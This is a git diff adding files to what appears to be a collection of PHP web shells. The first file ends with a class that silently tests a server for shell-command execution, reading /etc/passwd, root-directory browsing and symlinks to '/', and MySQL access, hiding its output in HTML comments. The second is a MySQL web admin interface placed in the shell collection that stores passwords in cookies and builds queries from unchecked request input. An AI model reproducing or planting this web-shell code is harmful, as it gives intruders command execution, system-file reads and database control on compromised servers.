+            return $mstate;
+        }
+    }
+
+    class php_check_silent
+    {
+
+        function php_check_silent($host="notset", $username="", $pass="", $db="") {
+            if ($host!="notset") {
+            $this->mysql_do = "yes";
+            $this->mysql_host = $host;
+            $this->mysql_user = $username;
+            $this->mysql_pass = $pass;
+            $this->mysql_db = $db;
+            } else { $this->mysql_do = "no"; }
+
+        $this->mainstate = "safe";
+
+        if ($this->system_checks("/bin/ls")) { $this->output_mainstate(1, "system checks"); } else { $this->output_mainstate(0, "system checks"); }
+        if ($this->reading_checks()) { $this->output_mainstate(1, "reading checks"); } else { $this->output_mainstate(0, "reading checks"); }
+        if ($this->miscfile_checks()) { $this->output_mainstate(1, "misc filesystem checks"); } else { $this->output_mainstate(0, "misc filesystem checks"); }
+        $this->mysql_checks();
+        }
+
+
+        function output_state($state = 0, $name = "function") {
+            if ($state==0) {
+            //echo "$name\t\tfailed\n";
+            }
+            if ($state==1) {
+            //echo "$name\t\t<font color=red>OK</font>\n";
+            }
+            if ($state==2) {
+            //echo "$name\t\t<font color=yellow>OK</font>\n";
+            }
+        }
+        function output_mainstate($state = 0, $name = "functions") {
+            if ($state==1) {
+            //echo "\n$name returned: <font color=red>VULNERABLE</font>\n\n";
+            $this->mainstate = "unsafe";
+            } else {
+            //echo "\n$name returned: <font color=green>OK</font>\n\n";
+            }
+        }
+
+        function system_checks($cmd = "/bin/ls") {
+        if ($pp = popen($cmd, "r")) {
+            if (fread($pp, 2096)) {
+            $this->output_state(1, "popen     ");
+            $sys = true;
+            } else {
+            $this->output_state(0, "popen     ");
+            }
+        } else { $this->output_state(0, "popen     "); }
+        if (@exec($cmd)) { $this->output_state(1, "exec     "); $sys = true; $this->cmd_method = "exec"; } else { $this->output_state(0, "exec     "); }
+        if (@shell_exec($cmd)) { $this->output_state(1, "shell_exec"); $sys = true; $this->cmd_method = "shel_exec"; } else { $this->output_state(0, "shell_exec"); }
+        echo "<!-- ";
+        if (@passthru($cmd)) { echo " -->"; $this->output_state(1, "passthru"); $sys = true; $this->cmd_method = "passthru"; } else { echo " -->"; $this->output_state(0, "passthru"); }
+        echo "<!-- ";
+        if (@system($cmd)) { echo " -->"; $this->output_state(1, "system   "); $sys = true; $this->cmd_method = "system"; } else { echo " -->"; $this->output_state(0, "system   "); }
+        //if ($output = `$cmd`)) { $this->output_state(1, "backtick"); $sys = true; } else { $this->output_state(0, "backtick"); }
+        if ($sys) { return 1; $this->cmd_state = "yes"; } else { return ; }
+        }
+
+        function reading_checks($file = "/etc/passwd") {
+            if (@function_exists("require_once")) {
+            if (@require_once($file)) { $this->output_state(1, "require_once"); $sys = true; } else { $this->output_state(0, "require_once"); }
+            }
+            if (@function_exists("require")) {
+            if (@require($file)) { $this->output_state(1, "require"); $sys = true; } else { $this->output_state(0, "require"); }
+            }
+            if (@function_exists("include")) {
+            if (@include($file)) { $this->output_state(1, "include "); $sys = true; } else { $this->output_state(0, "include "); }
+            }
+            if (@function_exists("file_get_contents")) {
+            if (@file_get_contents($file)) { $this->output_state(1, "filegetcontents"); $sys = true; } else { $this->output_state(0, "filegetcontents"); }
+            } else {
+            $this->output_state(0, "filegetcontents");
+            }
+        echo "<!-- ";
+        if (@show_source($file)) { echo " -->"; $this->output_state(1, "show_source"); $this->read_method = "show_source"; $sys = true; } else { echo " -->"; $this->output_state(0, "show_source"); }
+        echo "<!-- ";
+        if (@readfile($file)) { echo " -->"; $this->output_state(1, "readfile"); $this->read_method = "readfile"; $sys = true; } else { echo " -->"; $this->output_state(0, "readfile"); }
+        if (@fopen($file, "r")) { $this->output_state(1, "fopen   "); $this->read_method = "fopen"; $sys = true; } else { $this->output_state(0, "fopen   "); }
+        if (@file($file)) { $this->output_state(1, "file     "); $this->read_method = "file"; $sys = true; } else { $this->output_state(0, "file     "); }
+        if ($sys) { return 1; } else { return ; }
+        }
+
+        function miscfile_checks() {
+        $currentdir = @getcwd();
+        $scriptpath = $_SERVER["PATH_TRANSLATED"];
+        if (@opendir($currentdir)) {
+            $this->output_state(2, "opendir \$cwd");
+                $dp = @opendir("$currentdir");
+                $files="";
+                $this->browse_state = "lim";
+                while($file = @readdir($dp)) { $files .= $file; }
+                if (@strstr($files, '.')) {  $this->output_state(2, "readdir \$cwd"); $this->browse_state = "lim"; } else { $this->output_state(0, "readdir \$cwd"); }
+
+            } else { $this->output_state(0, "opendir \$cwd"); }
+        if (@opendir("/")) {
+            $this->output_state(1, "opendir /");
+            $sys = true;
+                $dp = @opendir("/");
+                $this->browse_state = "yes";
+                $files="";
+                while($file = @readdir($dp)) { $files .= $file; }
+                if (@strstr($files, '.')) {  $this->output_state(1, "readdir /"); $this->browse_state = "yes"; } else { $this->output_state(0, "readdir /"); }
+            } else { $this->output_state(0, "opendir /"); }
+        if (@mkdir("$currentdir/test", 0777)) { $this->output_state(1, "mkdir   "); $sys = true; } else { $this->output_state(0, "mkdir   "); }
+        if (@rmdir("$currentdir/test")) { $this->output_state(1, "rmdir     "); $sys = true; } else { $this->output_state(0, "rmdir     "); }
+        if (@copy($scriptpath, "$currentdir/copytest")) {
+            $this->output_state(2, "copy    ");
+            $sys = true;
+                if (@unlink("$currentdir/copytest")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+            } else {
+            $this->output_state(0, "copy    ");
+        }
+        if (@copy($scriptpath, "/tmp/copytest")) {
+            $this->output_state(2, "copy2/tmp");
+            //$sys = true;
+                if (!$del) {
+                if (@unlink("tmp/copytest")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+                }
+            } else {
+            $this->output_state(0, "copy2/tmp");
+        }
+        if (@link("/", "$currentdir/link2root")) {
+                $this->output_state(1, "link      ");
+                $sys = true;
+                if (!$del) {
+                if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+                }
+            } else {
+            $this->output_state(0, "link      ");
+        }
+        if (@symlink("/", "$currentdir/link2root")) {
+                $this->output_state(1, "symlink   ");
+                $sys = true;
+                if (!$del) {
+                if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+                }
+            } else {
+            $this->output_state(0, "symlink   ");
+        }
+        if ($sys) { return 1; } else { return ; }
+        }
+        function mysql_checks() {
+            if ($this->mysql_do=="yes") {
+                if (@mysql_pconnect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) {
+                $this->output_state(1, "mysql_pconnect"); $mstate = 1; $this->mysql_state = "ok";
+                } else { $this->output_state(0, "mysql_pconnect"); $mstate = 0; $this->mysql_state = "fail"; }
+            } else { $this->output_state(3, "mysql_pconnect"); $mstate = 2; $this->mysql_state = "pass"; }
+            if ($this->mysql_do=="yes") {
+                if (@mysql_connect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) {
+                $this->output_state(1, "mysql_connect"); $mstate = 1; $this->mysql_state = "ok";
+                } else { $this->output_state(0, "mysql_connect"); $mstate = 0; $this->mysql_state = "fail"; }
+            } else { $this->output_state(3, "mysql_connect"); $mstate = 2; $this->mysql_state = "pass"; }
+            if ($this->mysql_state=="fail") {
+            echo "<!-- MYSQL ERROR:\n".mysql_error()."\n-->";
+            echo "<script> alert(\"you have a mysql error:\\n ".mysql_error()."\\n\\nbecause of this the mysql exploiting will be off\"); </script>";
+            }
+            return $mstate;
+        }
+    }
+
+
+
+// the end :]
+?>
+<center>Copyright � 2003 <a href="http://www.bansacviet.net">BSV Groups</a>
+<br>PHP Shell Support by <a href="mailto:admin@bansacviet.net">DTN</a> 
\ No newline at end of file
diff --git a/xakep-shells/PHP/mysql_shell.php.txt b/xakep-shells/PHP/mysql_shell.php.txt
new file mode 100644
index 0000000..13cd5c8
--- /dev/null
+++ b/xakep-shells/PHP/mysql_shell.php.txt
@@ -0,0 +1,1169 @@
+<?
+/*
+ * MySQL Web Interface Version 0.8
+ * -------------------------------
+ * Developed By SooMin Kim (smkim@popeye.snu.ac.kr)
+ * License : GNU Public License (GPL)
+ * Homepage : http://popeye.snu.ac.kr/~smkim/mysql
+ */
+
+$HOSTNAME = "localhost";
+
+function logon() {
+	global $PHP_SELF;
+
+	setcookie( "mysql_web_admin_username" );
+	setcookie( "mysql_web_admin_password" );
+	echo "<html>\n";
+	echo "<head>\n";
+	echo "<title>MySQL Web Interface</title>\n";
+	echo "</head>\n";
+	echo "<body>\n";
+	echo "<table width=100% height=100%><tr><td><center>\n";
+	echo "<table cellpadding=2><tr><td bgcolor=#a4a260><center>\n";
+	echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n";
+	echo "<h1>MySQL Web Interface</h1>\n";
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=logon_submit>\n";
+	echo "<table cellpadding=5 cellspacing=1>\n";
+	echo "<tr><td>Username </td><td> <input type=text name=username></td></tr>\n";
+	echo "<tr><td>Password </td><td> <input type=password name=password></td></tr>\n";
+	echo "</table><p>\n";
+	echo "<input type=submit value='Enter'>\n";
+	echo "<input type=reset value='Clear'><br>\n";
+	echo "</form>\n";
+	echo "</center></td></tr></table>\n";
+	echo "</center></td></tr></table>\n";
+	echo "<p><hr width=300>\n";
+	echo "<font size=2>\n";
+	echo "Copyleft &copy; since 1999,\n";
+	echo "<a href='mailto:smkim76@icqmail.com'>SooMin Kim</a><br>\n";
+	echo "<a href='http://popeye.snu.ac.kr/~smkim/mysql'>Hompage<a> is available<br>";
+	echo "</font>\n";
+	echo "</center></td></tr></table>\n";
+	echo "</body>\n";
+	echo "</html>\n";
+}
+
+function logon_submit() {
+	global $username, $password, $PHP_SELF;
+
+	setcookie( "mysql_web_admin_username", $username );
+	setcookie( "mysql_web_admin_password", $password );
+	echo "<html>";
+	echo "<head>";
+	echo "<META HTTP-EQUIV=Refresh CONTENT='0; URL=$PHP_SELF?action=listDBs'>";
+	echo "</head>";
+	echo "</html>";
+}
+
+function echoQueryResult() {
+	global $queryStr, $errMsg;
+
+	if( $errMsg == "" ) $errMsg = "Success";
+	if( $queryStr != "" ) {
+		echo "<table cellpadding=5>\n";
+		echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
+		echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
+		echo "</table><p>\n";
+	}
+}
+
+function listDatabases() {
+	global $mysqlHandle, $PHP_SELF;
+
+	echo "<h1>Database List</h1>\n";
+
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=createDB>\n";
+	echo "<input type=text name=dbname>\n";
+	echo "<input type=submit value='Create Database'>\n";
+	echo "</form>\n";
+	echo "<hr>\n";
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+
+	$pDB = mysql_list_dbs( $mysqlHandle );
+	$num = mysql_num_rows( $pDB );
+	for( $i = 0; $i < $num; $i++ ) {
+		$dbname = mysql_dbname( $pDB, $i );
+		echo "<tr>\n";
+		echo "<td>$dbname</td>\n";
+		echo "<td><a href='$PHP_SELF?action=listTables&dbname=$dbname'>Table</a></td>\n";
+		echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n";
+		echo "<td><a href='$PHP_SELF?action=dumpDB&dbname=$dbname'>Dump</a></td>\n";
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+}
+
+function createDatabase() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	mysql_create_db( $dbname, $mysqlHandle );
+	listDatabases();
+}
+
+function dropDatabase() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	mysql_drop_db( $dbname, $mysqlHandle );
+	listDatabases();
+}
+
+function listTables() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	echo "<h1>Table List</h1>\n";
+	echo "<p class=location>$dbname</p>\n";
+	echoQueryResult();
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=createTable>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=text name=tablename>\n";
+	echo "<input type=submit value='Create Table'>\n";
+	echo "</form>\n";
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=query>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=text size=40 name=queryStr>\n";
+	//echo "<textarea cols=30 rows=3 name=queryStr></textarea><br>";
+	echo "<input type=submit value='Query'>\n";
+	echo "</form>\n";
+	echo "<hr>\n";
+
+	$pTable = mysql_list_tables( $dbname );
+
+	if( $pTable == 0 ) {
+		$msg  = mysql_error();
+		echo "<h3>Error : $msg</h3><p>\n";
+		return;
+	}
+	$num = mysql_num_rows( $pTable );
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$tablename = mysql_tablename( $pTable, $i );
+
+		echo "<tr>\n";
+		echo "<td>\n";
+		echo "$tablename\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>\n";
+		echo "</td>\n";
+		echo "</tr>\n";
+	}
+
+	echo "</table>";
+}
+
+function createTable() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+	$queryStr = "CREATE TABLE $tablename ( no INT )";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	listTables();
+}
+
+function dropTable() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+	$queryStr = "DROP TABLE $tablename";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	listTables();
+}
+
+function viewSchema() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+	echo "<h1>Table Schema</h1>\n";
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+	echoQueryResult();
+
+	echo "<a href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add Field</a> | \n";
+	echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>View Data</a>\n";
+	echo "<hr>\n";
+
+	$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+	$num = mysql_num_rows( $pResult );
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+	echo "<tr>\n";
+	echo "<th>Field</th>\n";
+	echo "<th>Type</th>\n";
+	echo "<th>Null</th>\n";
+	echo "<th>Key</th>\n";
+	echo "<th>Default</th>\n";
+	echo "<th>Extra</th>\n";
+	echo "<th colspan=2>Action</th>\n";
+	echo "</tr>\n";
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_array( $pResult );
+		echo "<tr>\n";
+		echo "<td>".$field["Field"]."</td>\n";
+		echo "<td>".$field["Type"]."</td>\n";
+		echo "<td>".$field["Null"]."</td>\n";
+		echo "<td>".$field["Key"]."</td>\n";
+		echo "<td>".$field["Default"]."</td>\n";
+		echo "<td>".$field["Extra"]."</td>\n";
+		$fieldname = $field["Field"];
+		echo "<td><a href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
+		echo "<td><a href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+}
+
+function manageField( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;
+
+	if( $cmd == "add" )
+		echo "<h1>Add Field</h1>\n";
+	else if( $cmd == "edit" ) {
+		echo "<h1>Edit Field</h1>\n";
+		$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+		$num = mysql_num_rows( $pResult );
+		for( $i = 0; $i < $num; $i++ ) {
+			$field = mysql_fetch_array( $pResult );
+			if( $field["Field"] == $fieldname ) {
+				$fieldtype = $field["Type"];
+				$fieldkey = $field["Key"];
+				$fieldextra = $field["Extra"];
+				$fieldnull = $field["Null"];
+				$fielddefault = $field["Default"];
+				break;
+			}
+		}
+		$type = strtok( $fieldtype, " (,)\n" );
+		if( strpos( $fieldtype, "(" ) ) {
+			if( $type == "enum" | $type == "set" ) {
+				$valuelist = strtok( " ()\n" );
+			} else {
+				$M = strtok( " (,)\n" );
+				if( strpos( $fieldtype, "," ) )
+					$D = strtok( " (,)\n" );
+			}
+		}
+	}
+
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+	echo "<form action=$PHP_SELF>\n";
+
+	if( $cmd == "add" )
+		echo "<input type=hidden name=action value=addField_submit>\n";
+	else if( $cmd == "edit" ) {
+		echo "<input type=hidden name=action value=editField_submit>\n";
+		echo "<input type=hidden name=old_name value=$fieldname>\n";
+	}
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=hidden name=tablename value=$tablename>\n";
+
+	echo "<h3>Name</h3>\n";
+	echo "<input type=text name=name value=$fieldname><p>\n";
+?>
+
+<h3>Type</h3>
+
+<font size=2>
+* `M' indicates the maximum display size.<br>
+* `D' applies to floating-point types and indicates the number of digits following the decimal point.<br>
+</font>
+
+<table>
+<tr>
+<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYINT" <? if( $type == "tinyint" ) echo "checked";?>>TINYINT (-128 ~ 127)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SMALLINT" <? if( $type == "smallint" ) echo "checked";?>>SMALLINT (-32768 ~ 32767)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMINT" <? if( $type == "mediumint" ) echo "checked";?>>MEDIUMINT (-8388608 ~ 8388607)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="INT" <? if( $type == "int" ) echo "checked";?>>INT (-2147483648 ~ 2147483647)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BIGINT" <? if( $type == "bigint" ) echo "checked";?>>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="FLOAT" <? if( $type == "float" ) echo "checked";?>>FLOAT</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DOUBLE" <? if( $type == "double" ) echo "checked";?>>DOUBLE</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DECIMAL" <? if( $type == "decimal" ) echo "checked";?>>DECIMAL(NUMERIC)</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATE" <? if( $type == "date" ) echo "checked";?>>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATETIME" <? if( $type == "datetime" ) echo "checked";?>>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIMESTAMP" <? if( $type == "timestamp" ) echo "checked";?>>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIME" <? if( $type == "time" ) echo "checked";?>>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="YEAR" <? if( $type == "year" ) echo "checked";?>>YEAR (1901 ~ 2155, 0000, YYYY)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="CHAR" <? if( $type == "char" ) echo "checked";?>>CHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="VARCHAR" <? if( $type == "varchar" ) echo "checked";?>>VARCHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYTEXT" <? if( $type == "tinytext" ) echo "checked";?>>TINYTEXT (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TEXT" <? if( $type == "text" ) echo "checked";?>>TEXT (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMTEXT" <? if( $type == "mediumtext" ) echo "checked";?>>MEDIUMTEXT (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGTEXT" <? if( $type == "longtext" ) echo "checked";?>>LONGTEXT (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYBLOB" <? if( $type == "tinyblob" ) echo "checked";?>>TINYBLOB (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BLOB" <? if( $type == "blob" ) echo "checked";?>>BLOB (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMBLOB" <? if( $type == "mediumblob" ) echo "checked";?>>MEDIUMBLOB (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGBLOB" <? if( $type == "longblob" ) echo "checked";?>>LONGBLOB (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr> 
+<tr>
+<td><input type=radio name=type value="ENUM" <? if( $type == "enum" ) echo "checked";?>>ENUM</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SET" <? if( $type == "set" ) echo "checked";?>>SET</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+
+</table>
+<table>
+<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: 'apple', 'orange', 'banana') </th></tr>
+<tr>
+<td align=center><input type=text size=4 name=M <? if( $M != "" ) echo "value=$M";?>></td>
+<td align=center><input type=text size=4 name=D <? if( $D != "" ) echo "value=$D";?>></td>
+<td align=center><input type=checkbox name=unsigned value="UNSIGNED" <? if( strpos( $fieldtype, "unsigned" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=zerofill value="ZEROFILL" <? if( strpos( $fieldtype, "zerofill" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=binary value="BINARY" <? if( strpos( $fieldtype, "binary" )  ) echo "checked";?>></td>
+<td align=center><input type=text size=60 name=valuelist <? if( $valuelist != "" ) echo "value=\"$valuelist\"";?>></td>
+</tr>
+</table>
+
+
+<h3>Flags</h3>
+<table>
+<tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr>
+<tr>
+<td align=center><input type=checkbox name=not_null value="NOT NULL" <? if( $fieldnull != "YES" ) echo "checked";?>></td>
+<td align=center><input type=text name=default_value <? if( $fielddefault != "" ) echo "value=$fielddefault";?>></td>
+<td align=center><input type=checkbox name=auto_increment value="AUTO_INCREMENT" <? if( $fieldextra == "auto_increment" ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=primary_key value="PRIMARY KEY" <? if( $fieldkey == "PRI" ) echo "checked";?>></td>
+</tr>
+</table>
+
+<p>
+
+<?
+	if( $cmd == "add" )
+		echo "<input type=submit value='Add Field'>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=submit value='Edit Field'>\n";
+	echo "<input type=button value=Cancel onClick='history.back()'>\n";
+	echo "</form>\n";
+}
+
+function manageField_submit( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, $PHP_SELF, $queryStr, $errMsg,
+		$M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, $auto_increment, $primary_key, $valuelist;
+
+	if( $cmd == "add" )
+		$queryStr = "ALTER TABLE $tablename ADD $name ";
+	else if( $cmd == "edit" )
+		$queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";
+	
+	if( $M != "" )
+		if( $D != "" )
+			$queryStr .= "$type($M,$D) ";
+		else
+			$queryStr .= "$type($M) ";
+	else if( $valuelist != "" ) {
+		$valuelist = stripslashes( $valuelist );
+		$queryStr .= "$type($valuelist) ";
+	} else
+		$queryStr .= "$type ";
+
+	$queryStr .= "$unsigned $zerofill $binary ";
+
+	if( $default_value != "" )
+		$queryStr .= "DEFAULT '$default_value' ";
+	
+	$queryStr .= "$not_null $auto_increment";
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	// key change
+	$keyChange = false;
+	$result = mysql_query( "SHOW KEYS FROM $tablename" );
+	$primary = "";
+	while( $row = mysql_fetch_array($result) )
+		if( $row["Key_name"] == "PRIMARY" ) {
+			if( $row[Column_name] == $name )
+				$keyChange = true;
+			else
+				$primary .= ", $row[Column_name]";
+		}
+	if( $primary_key == "PRIMARY KEY" ) {
+		$primary .= ", $name";
+		$keyChange = !$keyChange;
+	}
+	$primary = substr( $primary, 2 );
+	if( $keyChange == true ) {
+		$q = "ALTER TABLE $tablename DROP PRIMARY KEY";
+		mysql_query( $q );
+		$queryStr .= "<br>\n" . $q;
+		$errMsg .= "<br>\n" . mysql_error();
+		$q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
+		mysql_query( $q );
+		$queryStr .= "<br>\n" . $q;
+		$errMsg .= "<br>\n" . mysql_error();
+	}
+
+	viewSchema();
+}
+
+function dropField() {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+	$queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr , $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewSchema();
+}
+
+function viewData( $queryStr ) {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby;
+
+	echo "<h1>Data in Table</h1>\n";
+	if( $tablename != "" )
+		echo "<p class=location>$dbname &gt; $tablename</p>\n";
+	else
+		echo "<p class=location>$dbname</p>\n";
+
+	$queryStr = stripslashes( $queryStr );
+	if( $queryStr == "" ) {
+		$queryStr = "SELECT * FROM $tablename";
+		if( $orderby != "" )
+			$queryStr .= " ORDER BY $orderby";
+		echo "<a href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n";
+		echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+	}
+
+	$pResult = mysql_db_query( $dbname, $queryStr );
+	$errMsg = mysql_error();
